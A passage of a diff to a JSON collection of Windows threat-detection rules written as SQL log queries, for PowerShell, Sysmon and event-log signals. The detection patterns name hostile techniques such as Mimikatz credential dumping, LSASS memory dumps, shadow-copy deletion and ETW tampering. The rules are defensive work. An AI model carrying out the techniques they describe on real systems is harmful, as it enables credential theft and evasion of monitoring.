Folder", - "id": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", + "title": "PowerShell Hotfix Enumeration", + "id": "f5d1def8-1de0-4a0e-9794-1f6f27dd605c", "status": "experimental", - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects call to \"Win32_QuickFixEngineering\" in order to enumerate installed hotfixes often used in \"enum\" scripts by attackers", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.discovery" ], "falsepositives": [ - "Administrator PowerShell scripts" + "Legitimate administration scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (LocalName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR LocalName LIKE '%\\%public\\%%' ESCAPE '\\' OR LocalName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR LocalName LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Win32\\_QuickFixEngineering%' ESCAPE '\\' AND ScriptBlockText LIKE '%HotFixID%' ESCAPE '\\')" ], - "filename": "win_bits_client_susp_local_folder.yml" + "filename": "posh_ps_hotfix_enum.yml" }, { - "title": "Unsigned Binary Loaded From Suspicious Location", - "id": "8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10", + "title": "Invoke-Obfuscation Via Use Clip - Powershell", + "id": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", "status": "experimental", - "description": "Detects Code Integrity (CI) engine blocking processes from 
loading unsigned DLLs residing in suspicious locations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ImageName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageName LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" ], - "filename": "win_security_mitigations_unsigned_dll_from_susp_location.yml" + "filename": "posh_ps_invoke_obfuscation_via_use_clip.yml" }, { - "title": "Microsoft Defender Blocked from Loading Unsigned DLL", - "id": "0b0ea3cc-99c8-4730-9c53-45deee2a4c86", - "status": "experimental", - "description": "Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL", - "author": "Bhabesh Raj", + "title": "Powershell Detect Virtualization Environment", + "id": "d93129cd-1ee0-479f-bc03-ca6f129882e3", + "status": "test", + "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.\nThis may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox\n", + "author": "frack113, Duc.Le-GTSC", 
"tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1497.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ProcessPath LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR ProcessPath LIKE '%\\\\NisSrv.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\') AND (ScriptBlockText LIKE '%MSAcpi\\_ThermalZoneTemperature%' ESCAPE '\\' OR ScriptBlockText LIKE '%Win32\\_ComputerSystem%' ESCAPE '\\'))" ], - "filename": "win_security_mitigations_defender_load_unsigned_dll.yml" + "filename": "posh_ps_detect_vm_env.yml" }, { - "title": "Suspicious Digital Signature Of AppX Package", - "id": "b5aa7d60-c17e-4538-97de-09029d6cd76b", + "title": "Root Certificate Installed - PowerShell", + "id": "42821614-9264-4761-acfc-5772c3286f76", "status": "experimental", - "description": "Detects execution of AppX packages with known suspicious or malicious signature", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", "tags": [ "attack.defense_evasion", - "attack.execution" + "attack.t1553.004" ], "falsepositives": [ - "Unknown" + "Help Desk or IT may need to manually add a corporate Root CA on occasion. 
Need to test if GPO push doesn't trigger FP" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppxPackaging/Operational' AND EventID = '157' AND subjectName = 'CN=Foresee Consulting Inc., O=Foresee Consulting Inc., L=North York, S=Ontario, C=CA, SERIALNUMBER=1004913-1, OID.1.3.6.1.4.1.311.60.2.1.3=CA, OID.2.5.4.15=Private Organization')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Move-Item%' ESCAPE '\\' AND ScriptBlockText LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Import-Certificate%' ESCAPE '\\' AND ScriptBlockText LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\')))" ], - "filename": "win_appxpackaging_om_sups_appx_signature.yml" + "filename": "posh_ps_root_certificate_installed.yml" }, { - "title": "HybridConnectionManager Service Running", - "id": "b55d23e5-6821-44ff-8a6e-67218891e49f", - "status": "test", - "description": "Rule to detect the Hybrid Connection Manager service running on an endpoint.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Change PowerShell Policies to an Insecure Level - PowerShell", + "id": "61d0475c-173f-4844-86f7-f3eebae1c66b", + "status": "experimental", + "description": "Detects use of Set-ExecutionPolicy to set insecure policies", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1554" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use of Hybrid Connection Manager via Azure function apps." 
+ "Administrator script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-ServiceBus-Client' AND EventID IN ('40300', '40301', '40302') AND (logs MATCH ('\"HybridConnection\" OR \"sb://\" OR \"servicebus.windows.net\" OR \"HybridConnectionManage\"')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Set-ExecutionPolicy%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Unrestricted%' ESCAPE '\\' OR ScriptBlockText LIKE '%bypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%RemoteSigned%' ESCAPE '\\')) AND NOT ((ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\AppData\\\\Roaming\\\\Code\\\\%' ESCAPE '\\')))" ], - "filename": "win_hybridconnectionmgr_svc_running.yml" + "filename": "posh_ps_set_policies_to_unsecure_level.yml" }, { - "title": "Suspicious Application Installed", - "id": "83c161b6-ca67-4f33-8ad0-644a0737cf07", - "status": "experimental", - "description": "Detects suspicious application installed by looking at the added shortcut to the app resolver cache", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Execute Invoke-command on Remote Host", + "id": "7b836d7f-179c-4ba4-90a7-a7e60afb48e6", + "status": "test", + "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). 
The adversary may then perform actions as the logged-on user.", + "author": "frack113", "tags": [ - "attack.execution" + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Packages or applications being legitimately used by users or administrators" + "Legitimate script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '28115' AND (Name LIKE '%Zenmap%' ESCAPE '\\' OR Name LIKE '%AnyDesk%' ESCAPE '\\' OR Name LIKE '%wireshark%' ESCAPE '\\' OR Name LIKE '%openvpn%' ESCAPE '\\')) OR (EventID = '28115' AND (AppID LIKE '%zenmap.exe%' ESCAPE '\\' OR AppID LIKE '%prokzult ad%' ESCAPE '\\' OR AppID LIKE '%wireshark%' ESCAPE '\\' OR AppID LIKE '%openvpn%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%invoke-command %' ESCAPE '\\' AND ScriptBlockText LIKE '% -ComputerName %' ESCAPE '\\')" ], - "filename": "win_shell_core_susp_packages_installed.yml" + "filename": "posh_ps_invoke_command_remote.yml" }, { - "title": "Suspicious Rejected SMB Guest Logon From IP", - "id": "71886b70-d7b4-4dbf-acce-87d2ca135262", + "title": "Delete Volume Shadow Copies via WMI with PowerShell - PS Script", + "id": "e17121b4-ef2a-4418-8a59-12fb1631fa9e", "status": "test", - "description": "Detect Attempt PrintNightmare (CVE-2021-1675) Remote code execution in Windows Spooler Service", - "author": "Florian Roth (Nextron Systems), KevTheHermit, fuzzyf10w", + "description": "Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. 
This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1110.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Account fallback reasons (after failed login with specific account)" + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\')" + ], + "filename": "posh_ps_susp_win32_shadowcopy.yml" + }, + { + "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell", + "id": "20e5497e-331c-4cd5-8d36-935f6e2a9a07", + "status": "experimental", + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "author": "Timur Zinniatullin, oscd.community", + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "falsepositives": [ + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-SmbClient/Security' AND EventID = '31017' AND UserName = '' AND ServerName LIKE '\\\\1%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (ScriptBlockText LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR ScriptBlockText LIKE '%system.io.streamreader%' ESCAPE '\\') AND ScriptBlockText LIKE '%readtoend' ESCAPE '\\')" ], - "filename": "win_susp_failed_guest_logon.yml" + "filename": "posh_ps_invoke_obfuscation_via_compress.yml" }, { - "title": "Standard User In High Privileged Group", - "id": "7ac407cc-0f48-4328-aede-de1d2e6fef41", + "title": "Powershell 
Install a DLL in System Directory", + "id": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd", "status": "experimental", - "description": "Detect standard users login that are part of high privileged groups such as the Administrator group", - "author": "frack113", + "description": "Uses PowerShell to install/copy a a file into a system directory such as \"System32\" or \"SysWOW64\"", + "author": "frack113, Nasreddine Bencherchali", "tags": [ "attack.credential_access", - "attack.privilege_escalation" + "attack.t1556.002" ], "falsepositives": [ - "Standard domain users who are part of the administrator group. These users shouldn't have these right. But in the case where it's necessary. They should be filtered out using the \"TargetUserName\" field" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-LSA/Operational' AND (EventID = '300' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND (SidList LIKE '%S-1-5-32-544%' ESCAPE '\\' OR SidList LIKE '%-500}%' ESCAPE '\\' OR SidList LIKE '%-518}%' ESCAPE '\\' OR SidList LIKE '%-519}%' ESCAPE '\\')) AND NOT ((TargetUserSid LIKE '%-500' ESCAPE '\\' OR TargetUserSid LIKE '%-518' ESCAPE '\\' OR TargetUserSid LIKE '%-519' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Destination %' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Windows\\\\System32%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Windows\\\\SysWOW64%' ESCAPE '\\'))" ], - "filename": "win_lsa_server_normal_user_admin.yml" + "filename": "posh_ps_copy_item_system_directory.yml" }, { - "title": "Loading Diagcab Package From Remote Path", - "id": "50cb47b8-2c33-4b23-a2e9-4600657d9746", + "title": "Disable of ETW Trace - Powershell", + "id": "115fdba9-f017-42e6-84cf-d5573bf2ddf8", "status": "experimental", - "description": "Detects loading of diagcab 
packages from a remote path, as seen in DogWalk vulnerability", + "description": "Detects usage of powershell cmdlets to disable or remove ETW trace sessions", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1070", + "attack.t1562.006", + "car.2016-04-002" ], "falsepositives": [ - "Legitimate package hosted on a known and authorized remote location" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '101' AND PackagePath LIKE '%\\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Remove-EtwTraceProvider %' ESCAPE '\\' OR (ScriptBlockText LIKE '%Set-EtwTraceProvider %' ESCAPE '\\' AND ScriptBlockText LIKE '%0x11%' ESCAPE '\\')))" ], - "filename": "win_diagnosis_scripted_load_remote_diagcab.yml" + "filename": "posh_ps_etw_trace_evasion.yml" }, { - "title": "Direct Syscall of NtOpenProcess", - "id": "3f3f3506-1895-401b-9cc3-e86b16e630d0", + "title": "Winlogon Helper DLL", + "id": "851c506b-6b7c-4ce2-8802-c703009d03c0", "status": "experimental", - "description": "Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF.", - "author": "Christian Burkard (Nextron Systems), Tim Shelton", + "description": "Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\nRegistry entries in HKLM\\Software[Wow6432Node]Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are\nused to manage additional helper programs and functionalities that support Winlogon. 
Malicious modifications to these Registry keys may cause Winlogon to\nload and execute malicious DLLs and/or executables.\n", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.execution", - "attack.t1106" + "attack.persistence", + "attack.t1547.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CallTrace LIKE 'UNKNOWN%' ESCAPE '\\' AND NOT ((TargetImage LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceUI.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\' AND SourceImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\systeminfo.exe' ESCAPE '\\' AND SourceImage LIKE '%setup64.exe' ESCAPE '\\') OR (TargetImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\' AND SourceImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\' AND 
SourceImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Discord.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\AUDIODG.EXE' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND GrantedAccess = '0x1000') OR (Provider_Name = 'Microsoft-Windows-Kernel-Audit-API-Calls') OR (TargetImage LIKE '%\\\\Evernote\\\\Evernote.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CurrentVersion\\\\Winlogon%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Set-ItemProperty%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-Item%' ESCAPE '\\'))" ], - "filename": "proc_access_win_direct_syscall_ntopenprocess.yml" + "filename": "posh_ps_winlogon_helper_dll.yml" }, { - "title": "SysmonEnte Usage", - "id": 
"d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", - "status": "experimental", - "description": "Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon", - "author": "Florian Roth (Nextron Systems)", + "title": "Service Registry Permissions Weakness Check", + "id": "95afc12e-3cbb-40c3-9340-84a032e596a3", + "status": "test", + "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.persistence", + "attack.t1574.011" ], "falsepositives": [ - "Unknown" + "Legitimate administrative script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND GrantedAccess = '0x1400') AND NOT (((SourceImage LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\'))) OR CallTrace = 'Ente'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%get-acl%' ESCAPE '\\' AND ScriptBlockText LIKE '%REGISTRY::HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\')" ], - "filename": "proc_access_win_hack_sysmonente.yml" + "filename": "posh_ps_get_acl_service.yml" }, { - "title": "Suspicious LSASS Access Via MalSecLogon", - "id": 
"472159c5-31b9-4f56-b794-b766faa8b0a7", + "title": "Potential Invoke-Mimikatz PowerShell Script", + "id": "189e3b02-82b2-4b90-9662-411eb64486d4", "status": "experimental", - "description": "Detects suspicious access to Lsass handle via a call trace to \"seclogon.dll\"", - "author": "Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (sigma)", + "description": "Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.", + "author": "Tim Rauch", "tags": [ "attack.credential_access", - "attack.t1003.001" + "attack.t1003" ], "falsepositives": [ - "Unknown" + "Mimikatz can be useful for testing the security of networks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x14c0' AND CallTrace LIKE '%seclogon.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' AND ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\') OR ScriptBlockText LIKE '%sekurlsa::logonpasswords%' ESCAPE '\\' OR (ScriptBlockText LIKE '%crypto::certificates%' ESCAPE '\\' AND ScriptBlockText LIKE '%CERT\\_SYSTEM\\_STORE\\_LOCAL\\_MACHINE%' ESCAPE '\\')))" ], - "filename": "proc_access_win_susp_seclogon.yml" + "filename": "posh_ps_potential_invoke_mimikatz.yml" }, { - "title": "Potential Svchost Memory Access", - "id": "166e9c50-8cd9-44af-815d-d1f0c0e90dde", - "status": "experimental", - "description": "Detects potential access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service.", - "author": "Tim Burrell", + "title": "Live Memory Dump Using Powershell", + "id": 
"cd185561-4760-45d6-a63e-a51325112cae", + "status": "test", + "description": "Detects usage of a PowerShell command to dump the live memory of a Windows machine", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.t1003" ], "falsepositives": [ - "Unknown" + "Diagnostics" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND (CallTrace LIKE '%Microsoft.Build.ni.dll%' ESCAPE '\\' OR CallTrace LIKE '%System.ni.dll%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-StorageDiagnosticInfo%' ESCAPE '\\' AND ScriptBlockText LIKE '%-IncludeLiveDump%' ESCAPE '\\')" ], - "filename": "proc_access_win_invoke_phantom.yml" + "filename": "posh_ps_memorydump_getstoragediagnosticinfo.yml" }, { - "title": "Lsass Memory Dump via Comsvcs DLL", - "id": "a49fa4d5-11db-418c-8473-1e014a8dd462", - "status": "test", - "description": "Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Suspicious Hyper-V Cmdlets", + "id": "42d36aa1-3240-4db0-8257-e0118dcdd9cd", + "status": "experimental", + "description": "Adversaries may carry out malicious operations using a virtual instance to avoid detection", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1564.006" ], 
"falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' AND CallTrace LIKE '%comsvcs.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%New-VM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-VMFirmware%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-VM%' ESCAPE '\\'))" ], - "filename": "proc_access_win_lsass_dump_comsvcs_dll.yml" + "filename": "posh_ps_susp_hyper_v_condlet.yml" }, { - "title": "UAC Bypass Using WOW64 Logger DLL Hijack", - "id": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c", + "title": "Code Executed Via Office Add-in XLL File", + "id": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", "status": "test", - "description": "Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.persistence", + "attack.t1137.006" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' AND GrantedAccess = '0x1fffff' AND CallTrace LIKE 'UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 
